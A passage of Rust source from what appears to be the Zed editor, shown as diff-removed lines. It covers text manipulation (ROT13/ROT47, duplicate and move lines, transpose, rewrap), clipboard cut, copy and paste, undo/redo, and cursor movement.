'n'..='z' => ((c as u8) - 13) as char, - _ => c, - }) - .collect() - }) - } - - pub fn convert_to_rot47( - &mut self, - _: &ConvertToRot47, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| { - text.chars() - .map(|c| { - let code_point = c as u32; - if code_point >= 33 && code_point <= 126 { - return char::from_u32(33 + ((code_point + 14) % 94)).unwrap(); - } - c - }) - .collect() - }) - } - - fn manipulate_text(&mut self, window: &mut Window, cx: &mut Context, mut callback: Fn) - where - Fn: FnMut(&str) -> String, - { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = self.buffer.read(cx).snapshot(cx); - - let mut new_selections = Vec::new(); - let mut edits = Vec::new(); - let mut selection_adjustment = 0i32; - - for selection in self.selections.all::(cx) { - let selection_is_empty = selection.is_empty(); - - let (start, end) = if selection_is_empty { - let word_range = movement::surrounding_word( - &display_map, - selection.start.to_display_point(&display_map), - ); - let start = word_range.start.to_offset(&display_map, Bias::Left); - let end = word_range.end.to_offset(&display_map, Bias::Left); - (start, end) - } else { - (selection.start, selection.end) - }; - - let text = buffer.text_for_range(start..end).collect::(); - let old_length = text.len() as i32; - let text = callback(&text); - - new_selections.push(Selection { - start: (start as i32 - selection_adjustment) as usize, - end: ((start + text.len()) as i32 - selection_adjustment) as usize, - goal: SelectionGoal::None, - ..selection - }); - - selection_adjustment += old_length - text.len() as i32; - - edits.push((start..end, text)); - } - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - }); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }); - - this.request_autoscroll(Autoscroll::fit(), cx); - }); - } - - pub fn duplicate( - &mut self, - upwards: bool, - whole_lines: bool, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - let selections = self.selections.all::(cx); - - let mut edits = Vec::new(); - let mut selections_iter = selections.iter().peekable(); - while let Some(selection) = selections_iter.next() { - let mut rows = selection.spanned_rows(false, &display_map); - // duplicate line-wise - if whole_lines || selection.start == selection.end { - // Avoid duplicating the same lines twice. - while let Some(next_selection) = selections_iter.peek() { - let next_rows = next_selection.spanned_rows(false, &display_map); - if next_rows.start < rows.end { - rows.end = next_rows.end; - selections_iter.next().unwrap(); - } else { - break; - } - } - - // Copy the text from the selected row region and splice it either at the start - // or end of the region. - let start = Point::new(rows.start.0, 0); - let end = Point::new( - rows.end.previous_row().0, - buffer.line_len(rows.end.previous_row()), - ); - let text = buffer - .text_for_range(start..end) - .chain(Some("\n")) - .collect::(); - let insert_location = if upwards { - Point::new(rows.end.0, 0) - } else { - start - }; - edits.push((insert_location..insert_location, text)); - } else { - // duplicate character-wise - let start = selection.start; - let end = selection.end; - let text = buffer.text_for_range(start..end).collect::(); - edits.push((selection.end..selection.end, text)); - } - } - - self.transact(window, cx, |this, _, cx| { - this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - }); - - this.request_autoscroll(Autoscroll::fit(), cx); - }); - } - - pub fn duplicate_line_up( - &mut self, - _: &DuplicateLineUp, - window: &mut Window, - cx: &mut Context, - ) { - self.duplicate(true, true, window, cx); - } - - pub fn duplicate_line_down( - &mut self, - _: &DuplicateLineDown, - window: &mut Window, - cx: &mut Context, - ) { - self.duplicate(false, true, window, cx); - } - - pub fn duplicate_selection( - &mut self, - _: &DuplicateSelection, - window: &mut Window, - cx: &mut Context, - ) { - self.duplicate(false, false, window, cx); - } - - pub fn move_line_up(&mut self, _: &MoveLineUp, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = self.buffer.read(cx).snapshot(cx); - - let mut edits = Vec::new(); - let mut unfold_ranges = Vec::new(); - let mut refold_creases = Vec::new(); - - let selections = self.selections.all::(cx); - let mut selections = selections.iter().peekable(); - let mut contiguous_row_selections = Vec::new(); - let mut new_selections = Vec::new(); - - while let Some(selection) = selections.next() { - // Find all the selections that span a contiguous row range - let (start_row, end_row) = consume_contiguous_rows( - &mut contiguous_row_selections, - selection, - &display_map, - &mut selections, - ); - - // Move the text spanned by the row range to be before the line preceding the row range - if start_row.0 > 0 { - let range_to_move = Point::new( - start_row.previous_row().0, - buffer.line_len(start_row.previous_row()), - ) - ..Point::new( - end_row.previous_row().0, - buffer.line_len(end_row.previous_row()), - ); - let insertion_point = display_map - .prev_line_boundary(Point::new(start_row.previous_row().0, 0)) - .0; - - // Don't move lines across excerpts - if buffer - .excerpt_containing(insertion_point..range_to_move.end) - .is_some() - { - let text = buffer - .text_for_range(range_to_move.clone()) - .flat_map(|s| s.chars()) - .skip(1) - .chain(['\n']) - .collect::(); - - edits.push(( - buffer.anchor_after(range_to_move.start) - ..buffer.anchor_before(range_to_move.end), - String::new(), - )); - let insertion_anchor = buffer.anchor_after(insertion_point); - edits.push((insertion_anchor..insertion_anchor, text)); - - let row_delta = range_to_move.start.row - insertion_point.row + 1; - - // Move selections up - new_selections.extend(contiguous_row_selections.drain(..).map( - |mut selection| { - selection.start.row -= row_delta; - selection.end.row -= row_delta; - selection - }, - )); - - // Move folds up - unfold_ranges.push(range_to_move.clone()); - for fold in display_map.folds_in_range( - buffer.anchor_before(range_to_move.start) - ..buffer.anchor_after(range_to_move.end), - ) { - let mut start = fold.range.start.to_point(&buffer); - let mut end = fold.range.end.to_point(&buffer); - start.row -= row_delta; - end.row -= row_delta; - refold_creases.push(Crease::simple(start..end, fold.placeholder.clone())); - } - } - } - - // If we didn't move line(s), preserve the existing selections - new_selections.append(&mut contiguous_row_selections); - } - - self.transact(window, cx, |this, window, cx| { - this.unfold_ranges(&unfold_ranges, true, true, cx); - this.buffer.update(cx, |buffer, cx| { - for (range, text) in edits { - buffer.edit([(range, text)], None, cx); - } - }); - this.fold_creases(refold_creases, true, window, cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }) - }); - } - - pub fn move_line_down( - &mut self, - _: &MoveLineDown, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = self.buffer.read(cx).snapshot(cx); - - let mut edits = Vec::new(); - let mut unfold_ranges = Vec::new(); - let mut refold_creases = Vec::new(); - - let selections = self.selections.all::(cx); - let mut selections = selections.iter().peekable(); - let mut contiguous_row_selections = Vec::new(); - let mut new_selections = Vec::new(); - - while let Some(selection) = selections.next() { - // Find all the selections that span a contiguous row range - let (start_row, end_row) = consume_contiguous_rows( - &mut contiguous_row_selections, - selection, - &display_map, - &mut selections, - ); - - // Move the text spanned by the row range to be after the last line of the row range - if end_row.0 <= buffer.max_point().row { - let range_to_move = - MultiBufferPoint::new(start_row.0, 0)..MultiBufferPoint::new(end_row.0, 0); - let insertion_point = display_map - .next_line_boundary(MultiBufferPoint::new(end_row.0, 0)) - .0; - - // Don't move lines across excerpt boundaries - if buffer - .excerpt_containing(range_to_move.start..insertion_point) - .is_some() - { - let mut text = String::from("\n"); - text.extend(buffer.text_for_range(range_to_move.clone())); - text.pop(); // Drop trailing newline - edits.push(( - buffer.anchor_after(range_to_move.start) - ..buffer.anchor_before(range_to_move.end), - String::new(), - )); - let insertion_anchor = buffer.anchor_after(insertion_point); - edits.push((insertion_anchor..insertion_anchor, text)); - - let row_delta = insertion_point.row - range_to_move.end.row + 1; - - // Move selections down - new_selections.extend(contiguous_row_selections.drain(..).map( - |mut selection| { - selection.start.row += row_delta; - selection.end.row += row_delta; - selection - }, - )); - - // Move folds down - unfold_ranges.push(range_to_move.clone()); - for fold in display_map.folds_in_range( - buffer.anchor_before(range_to_move.start) - ..buffer.anchor_after(range_to_move.end), - ) { - let mut start = fold.range.start.to_point(&buffer); - let mut end = fold.range.end.to_point(&buffer); - start.row += row_delta; - end.row += row_delta; - refold_creases.push(Crease::simple(start..end, fold.placeholder.clone())); - } - } - } - - // If we didn't move line(s), preserve the existing selections - new_selections.append(&mut contiguous_row_selections); - } - - self.transact(window, cx, |this, window, cx| { - this.unfold_ranges(&unfold_ranges, true, true, cx); - this.buffer.update(cx, |buffer, cx| { - for (range, text) in edits { - buffer.edit([(range, text)], None, cx); - } - }); - this.fold_creases(refold_creases, true, window, cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections) - }); - }); - } - - pub fn transpose(&mut self, _: &Transpose, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let text_layout_details = &self.text_layout_details(window); - self.transact(window, cx, |this, window, cx| { - let edits = this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let mut edits: Vec<(Range, String)> = Default::default(); - s.move_with(|display_map, selection| { - if !selection.is_empty() { - return; - } - - let mut head = selection.head(); - let mut transpose_offset = head.to_offset(display_map, Bias::Right); - if head.column() == display_map.line_len(head.row()) { - transpose_offset = display_map - .buffer_snapshot - .clip_offset(transpose_offset.saturating_sub(1), Bias::Left); - } - - if transpose_offset == 0 { - return; - } - - *head.column_mut() += 1; - head = display_map.clip_point(head, Bias::Right); - let goal = SelectionGoal::HorizontalPosition( - display_map - .x_for_display_point(head, text_layout_details) - .into(), - ); - selection.collapse_to(head, goal); - - let transpose_start = display_map - .buffer_snapshot - .clip_offset(transpose_offset.saturating_sub(1), Bias::Left); - if edits.last().map_or(true, |e| e.0.end <= transpose_start) { - let transpose_end = display_map - .buffer_snapshot - .clip_offset(transpose_offset + 1, Bias::Right); - if let Some(ch) = - display_map.buffer_snapshot.chars_at(transpose_start).next() - { - edits.push((transpose_start..transpose_offset, String::new())); - edits.push((transpose_end..transpose_end, ch.to_string())); - } - } - }); - edits - }); - this.buffer - .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); - let selections = this.selections.all::(cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections); - }); - }); - } - - pub fn rewrap(&mut self, _: &Rewrap, _: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.rewrap_impl(RewrapOptions::default(), cx) - } - - pub fn rewrap_impl(&mut self, options: RewrapOptions, cx: &mut Context) { - let buffer = self.buffer.read(cx).snapshot(cx); - let selections = self.selections.all::(cx); - let mut selections = selections.iter().peekable(); - - let mut edits = Vec::new(); - let mut rewrapped_row_ranges = Vec::>::new(); - - while let Some(selection) = selections.next() { - let mut start_row = selection.start.row; - let mut end_row = selection.end.row; - - // Skip selections that overlap with a range that has already been rewrapped. - let selection_range = start_row..end_row; - if rewrapped_row_ranges - .iter() - .any(|range| range.overlaps(&selection_range)) - { - continue; - } - - let tab_size = buffer.language_settings_at(selection.head(), cx).tab_size; - - // Since not all lines in the selection may be at the same indent - // level, choose the indent size that is the most common between all - // of the lines. - // - // If there is a tie, we use the deepest indent. - let (indent_size, indent_end) = { - let mut indent_size_occurrences = HashMap::default(); - let mut rows_by_indent_size = HashMap::>::default(); - - for row in start_row..=end_row { - let indent = buffer.indent_size_for_line(MultiBufferRow(row)); - rows_by_indent_size.entry(indent).or_default().push(row); - *indent_size_occurrences.entry(indent).or_insert(0) += 1; - } - - let indent_size = indent_size_occurrences - .into_iter() - .max_by_key(|(indent, count)| (*count, indent.len_with_expanded_tabs(tab_size))) - .map(|(indent, _)| indent) - .unwrap_or_default(); - let row = rows_by_indent_size[&indent_size][0]; - let indent_end = Point::new(row, indent_size.len); - - (indent_size, indent_end) - }; - - let mut line_prefix = indent_size.chars().collect::(); - - let mut inside_comment = false; - if let Some(comment_prefix) = - buffer - .language_scope_at(selection.head()) - .and_then(|language| { - language - .line_comment_prefixes() - .iter() - .find(|prefix| buffer.contains_str_at(indent_end, prefix)) - .cloned() - }) - { - line_prefix.push_str(&comment_prefix); - inside_comment = true; - } - - let language_settings = buffer.language_settings_at(selection.head(), cx); - let allow_rewrap_based_on_language = match language_settings.allow_rewrap { - RewrapBehavior::InComments => inside_comment, - RewrapBehavior::InSelections => !selection.is_empty(), - RewrapBehavior::Anywhere => true, - }; - - let should_rewrap = options.override_language_settings - || allow_rewrap_based_on_language - || self.hard_wrap.is_some(); - if !should_rewrap { - continue; - } - - if selection.is_empty() { - 'expand_upwards: while start_row > 0 { - let prev_row = start_row - 1; - if buffer.contains_str_at(Point::new(prev_row, 0), &line_prefix) - && buffer.line_len(MultiBufferRow(prev_row)) as usize > line_prefix.len() - { - start_row = prev_row; - } else { - break 'expand_upwards; - } - } - - 'expand_downwards: while end_row < buffer.max_point().row { - let next_row = end_row + 1; - if buffer.contains_str_at(Point::new(next_row, 0), &line_prefix) - && buffer.line_len(MultiBufferRow(next_row)) as usize > line_prefix.len() - { - end_row = next_row; - } else { - break 'expand_downwards; - } - } - } - - let start = Point::new(start_row, 0); - let start_offset = start.to_offset(&buffer); - let end = Point::new(end_row, buffer.line_len(MultiBufferRow(end_row))); - let selection_text = buffer.text_for_range(start..end).collect::(); - let Some(lines_without_prefixes) = selection_text - .lines() - .map(|line| { - line.strip_prefix(&line_prefix) - .or_else(|| line.trim_start().strip_prefix(&line_prefix.trim_start())) - .with_context(|| { - format!("line did not start with prefix {line_prefix:?}: {line:?}") - }) - }) - .collect::, _>>() - .log_err() - else { - continue; - }; - - let wrap_column = self.hard_wrap.unwrap_or_else(|| { - buffer - .language_settings_at(Point::new(start_row, 0), cx) - .preferred_line_length as usize - }); - let wrapped_text = wrap_with_prefix( - line_prefix, - lines_without_prefixes.join("\n"), - wrap_column, - tab_size, - options.preserve_existing_whitespace, - ); - - // TODO: should always use char-based diff while still supporting cursor behavior that - // matches vim. - let mut diff_options = DiffOptions::default(); - if options.override_language_settings { - diff_options.max_word_diff_len = 0; - diff_options.max_word_diff_line_count = 0; - } else { - diff_options.max_word_diff_len = usize::MAX; - diff_options.max_word_diff_line_count = usize::MAX; - } - - for (old_range, new_text) in - text_diff_with_options(&selection_text, &wrapped_text, diff_options) - { - let edit_start = buffer.anchor_after(start_offset + old_range.start); - let edit_end = buffer.anchor_after(start_offset + old_range.end); - edits.push((edit_start..edit_end, new_text)); - } - - rewrapped_row_ranges.push(start_row..=end_row); - } - - self.buffer - .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); - } - - pub fn cut_common(&mut self, window: &mut Window, cx: &mut Context) -> ClipboardItem { - let mut text = String::new(); - let buffer = self.buffer.read(cx).snapshot(cx); - let mut selections = self.selections.all::(cx); - let mut clipboard_selections = Vec::with_capacity(selections.len()); - { - let max_point = buffer.max_point(); - let mut is_first = true; - for selection in &mut selections { - let is_entire_line = selection.is_empty() || self.selections.line_mode; - if is_entire_line { - selection.start = Point::new(selection.start.row, 0); - if !selection.is_empty() && selection.end.column == 0 { - selection.end = cmp::min(max_point, selection.end); - } else { - selection.end = cmp::min(max_point, Point::new(selection.end.row + 1, 0)); - } - selection.goal = SelectionGoal::None; - } - if is_first { - is_first = false; - } else { - text += "\n"; - } - let mut len = 0; - for chunk in buffer.text_for_range(selection.start..selection.end) { - text.push_str(chunk); - len += chunk.len(); - } - clipboard_selections.push(ClipboardSelection { - len, - is_entire_line, - first_line_indent: buffer - .indent_size_for_line(MultiBufferRow(selection.start.row)) - .len, - }); - } - } - - self.transact(window, cx, |this, window, cx| { - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections); - }); - this.insert("", window, cx); - }); - ClipboardItem::new_string_with_json_metadata(text, clipboard_selections) - } - - pub fn cut(&mut self, _: &Cut, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let item = self.cut_common(window, cx); - cx.write_to_clipboard(item); - } - - pub fn kill_ring_cut(&mut self, _: &KillRingCut, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.change_selections(None, window, cx, |s| { - s.move_with(|snapshot, sel| { - if sel.is_empty() { - sel.end = DisplayPoint::new(sel.end.row(), snapshot.line_len(sel.end.row())) - } - }); - }); - let item = self.cut_common(window, cx); - cx.set_global(KillRing(item)) - } - - pub fn kill_ring_yank( - &mut self, - _: &KillRingYank, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let (text, metadata) = if let Some(KillRing(item)) = cx.try_global() { - if let Some(ClipboardEntry::String(kill_ring)) = item.entries().first() { - (kill_ring.text().to_string(), kill_ring.metadata_json()) - } else { - return; - } - } else { - return; - }; - self.do_paste(&text, metadata, false, window, cx); - } - - pub fn copy_and_trim(&mut self, _: &CopyAndTrim, _: &mut Window, cx: &mut Context) { - self.do_copy(true, cx); - } - - pub fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context) { - self.do_copy(false, cx); - } - - fn do_copy(&self, strip_leading_indents: bool, cx: &mut Context) { - let selections = self.selections.all::(cx); - let buffer = self.buffer.read(cx).read(cx); - let mut text = String::new(); - - let mut clipboard_selections = Vec::with_capacity(selections.len()); - { - let max_point = buffer.max_point(); - let mut is_first = true; - for selection in &selections { - let mut start = selection.start; - let mut end = selection.end; - let is_entire_line = selection.is_empty() || self.selections.line_mode; - if is_entire_line { - start = Point::new(start.row, 0); - end = cmp::min(max_point, Point::new(end.row + 1, 0)); - } - - let mut trimmed_selections = Vec::new(); - if strip_leading_indents && end.row.saturating_sub(start.row) > 0 { - let row = MultiBufferRow(start.row); - let first_indent = buffer.indent_size_for_line(row); - if first_indent.len == 0 || start.column > first_indent.len { - trimmed_selections.push(start..end); - } else { - trimmed_selections.push( - Point::new(row.0, first_indent.len) - ..Point::new(row.0, buffer.line_len(row)), - ); - for row in start.row + 1..=end.row { - let mut line_len = buffer.line_len(MultiBufferRow(row)); - if row == end.row { - line_len = end.column; - } - if line_len == 0 { - trimmed_selections - .push(Point::new(row, 0)..Point::new(row, line_len)); - continue; - } - let row_indent_size = buffer.indent_size_for_line(MultiBufferRow(row)); - if row_indent_size.len >= first_indent.len { - trimmed_selections.push( - Point::new(row, first_indent.len)..Point::new(row, line_len), - ); - } else { - trimmed_selections.clear(); - trimmed_selections.push(start..end); - break; - } - } - } - } else { - trimmed_selections.push(start..end); - } - - for trimmed_range in trimmed_selections { - if is_first { - is_first = false; - } else { - text += "\n"; - } - let mut len = 0; - for chunk in buffer.text_for_range(trimmed_range.start..trimmed_range.end) { - text.push_str(chunk); - len += chunk.len(); - } - clipboard_selections.push(ClipboardSelection { - len, - is_entire_line, - first_line_indent: buffer - .indent_size_for_line(MultiBufferRow(trimmed_range.start.row)) - .len, - }); - } - } - } - - cx.write_to_clipboard(ClipboardItem::new_string_with_json_metadata( - text, - clipboard_selections, - )); - } - - pub fn do_paste( - &mut self, - text: &String, - clipboard_selections: Option>, - handle_entire_lines: bool, - window: &mut Window, - cx: &mut Context, - ) { - if self.read_only(cx) { - return; - } - - let clipboard_text = Cow::Borrowed(text); - - self.transact(window, cx, |this, window, cx| { - if let Some(mut clipboard_selections) = clipboard_selections { - let old_selections = this.selections.all::(cx); - let all_selections_were_entire_line = - clipboard_selections.iter().all(|s| s.is_entire_line); - let first_selection_indent_column = - clipboard_selections.first().map(|s| s.first_line_indent); - if clipboard_selections.len() != old_selections.len() { - clipboard_selections.drain(..); - } - let cursor_offset = this.selections.last::(cx).head(); - let mut auto_indent_on_paste = true; - - this.buffer.update(cx, |buffer, cx| { - let snapshot = buffer.read(cx); - auto_indent_on_paste = snapshot - .language_settings_at(cursor_offset, cx) - .auto_indent_on_paste; - - let mut start_offset = 0; - let mut edits = Vec::new(); - let mut original_indent_columns = Vec::new(); - for (ix, selection) in old_selections.iter().enumerate() { - let to_insert; - let entire_line; - let original_indent_column; - if let Some(clipboard_selection) = clipboard_selections.get(ix) { - let end_offset = start_offset + clipboard_selection.len; - to_insert = &clipboard_text[start_offset..end_offset]; - entire_line = clipboard_selection.is_entire_line; - start_offset = end_offset + 1; - original_indent_column = Some(clipboard_selection.first_line_indent); - } else { - to_insert = clipboard_text.as_str(); - entire_line = all_selections_were_entire_line; - original_indent_column = first_selection_indent_column - } - - // If the corresponding selection was empty when this slice of the - // clipboard text was written, then the entire line containing the - // selection was copied. If this selection is also currently empty, - // then paste the line before the current line of the buffer. - let range = if selection.is_empty() && handle_entire_lines && entire_line { - let column = selection.start.to_point(&snapshot).column as usize; - let line_start = selection.start - column; - line_start..line_start - } else { - selection.range() - }; - - edits.push((range, to_insert)); - original_indent_columns.push(original_indent_column); - } - drop(snapshot); - - buffer.edit( - edits, - if auto_indent_on_paste { - Some(AutoindentMode::Block { - original_indent_columns, - }) - } else { - None - }, - cx, - ); - }); - - let selections = this.selections.all::(cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - } else { - this.insert(&clipboard_text, window, cx); - } - }); - } - - pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - if let Some(item) = cx.read_from_clipboard() { - let entries = item.entries(); - - match entries.first() { - // For now, we only support applying metadata if there's one string. In the future, we can incorporate all the selections - // of all the pasted entries. - Some(ClipboardEntry::String(clipboard_string)) if entries.len() == 1 => self - .do_paste( - clipboard_string.text(), - clipboard_string.metadata_json::>(), - true, - window, - cx, - ), - _ => self.do_paste(&item.text().unwrap_or_default(), None, true, window, cx), - } - } - } - - pub fn undo(&mut self, _: &Undo, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.undo(cx)) { - if let Some((selections, _)) = - self.selection_history.transaction(transaction_id).cloned() - { - self.change_selections(None, window, cx, |s| { - s.select_anchors(selections.to_vec()); - }); - } else { - log::error!( - "No entry in selection_history found for undo. \ - This may correspond to a bug where undo does not update the selection. \ - If this is occurring, please add details to \ - https://github.com/zed-industries/zed/issues/22692" - ); - } - self.request_autoscroll(Autoscroll::fit(), cx); - self.unmark_text(window, cx); - self.refresh_inline_completion(true, false, window, cx); - cx.emit(EditorEvent::Edited { transaction_id }); - cx.emit(EditorEvent::TransactionUndone { transaction_id }); - } - } - - pub fn redo(&mut self, _: &Redo, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.redo(cx)) { - if let Some((_, Some(selections))) = - self.selection_history.transaction(transaction_id).cloned() - { - self.change_selections(None, window, cx, |s| { - s.select_anchors(selections.to_vec()); - }); - } else { - log::error!( - "No entry in selection_history found for redo. \ - This may correspond to a bug where undo does not update the selection. \ - If this is occurring, please add details to \ - https://github.com/zed-industries/zed/issues/22692" - ); - } - self.request_autoscroll(Autoscroll::fit(), cx); - self.unmark_text(window, cx); - self.refresh_inline_completion(true, false, window, cx); - cx.emit(EditorEvent::Edited { transaction_id }); - } - } - - pub fn finalize_last_transaction(&mut self, cx: &mut Context) { - self.buffer - .update(cx, |buffer, cx| buffer.finalize_last_transaction(cx)); - } - - pub fn group_until_transaction(&mut self, tx_id: TransactionId, cx: &mut Context) { - self.buffer - .update(cx, |buffer, cx| buffer.group_until_transaction(tx_id, cx)); - } - - pub fn move_left(&mut self, _: &MoveLeft, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - let cursor = if selection.is_empty() { - movement::left(map, selection.start) - } else { - selection.start - }; - selection.collapse_to(cursor, SelectionGoal::None); - }); - }) - } - - pub fn select_left(&mut self, _: &SelectLeft, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| (movement::left(map, head), SelectionGoal::None)); - }) - } - - pub fn move_right(&mut self, _: &MoveRight, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - let cursor = if selection.is_empty() { - movement::right(map, selection.end) - } else { - selection.end - }; - selection.collapse_to(cursor, SelectionGoal::None) - }); - }) - } - - pub fn select_right(&mut self, _: &SelectRight, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| (movement::right(map, head), SelectionGoal::None)); - }) - } - - pub fn move_up(&mut self, _: &MoveUp, window: &mut Window, cx: &mut Context) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - let selection_count = self.selections.count(); - let first_selection = self.selections.first_anchor(); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::up( - map, - selection.start, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }); - - if selection_count == 1 && first_selection.range() == self.selections.first_anchor().range() - { - cx.propagate(); - } - } - - pub fn move_up_by_lines( - &mut self, - action: &MoveUpByLines, - window: &mut Window, - cx: &mut Context, - ) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::up_by_rows( - map, - selection.start, - action.lines, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }) - } - - pub fn move_down_by_lines( - &mut self, - action: &MoveDownByLines, - window: &mut Window, - cx: &mut Context, - ) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::down_by_rows( - map, - selection.start, - action.lines, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }) - } - - pub fn select_down_by_lines( - &mut self, - action: &SelectDownByLines, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::down_by_rows(map, head, action.lines, goal, false, text_layout_details) - }) - }) - } - - pub fn select_up_by_lines( - &mut self, - action: &SelectUpByLines, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::up_by_rows(map, head, action.lines, goal, false, text_layout_details) - }) - }) - } - - pub fn select_page_up( - &mut self, - _: &SelectPageUp, - window: &mut Window, - cx: &mut Context, - ) { - let Some(row_count) = self.visible_row_count() else { - return; - }; - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::up_by_rows(map, head, row_count, goal, false, text_layout_details) - }) - }) - } - - pub fn move_page_up( - &mut self, - action: &MovePageUp, - window: &mut Window, - cx: &mut Context, - ) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if self - .context_menu - .borrow_mut() - .as_mut() - .map(|menu| menu.select_first(self.completion_provider.as_deref(), cx)) - .unwrap_or(false) - { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - - let Some(row_count) = self.visible_row_count() else { - return; - }; - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let autoscroll = if action.center_cursor { - Autoscroll::center() - } else { - Autoscroll::fit() - }; - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(autoscroll), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::up_by_rows( - map, - selection.end, - row_count, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }); - } - - pub fn select_up(&mut self, _: &SelectUp, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::up(map, head, goal, false, text_layout_details) - }) - }) - } - - pub fn move_down(&mut self, _: &MoveDown, window: &mut Window, cx: &mut Context) { - self.take_rename(true, window, cx); - - if matches!(self.mode, EditorMode::SingleLine { .. }) { - 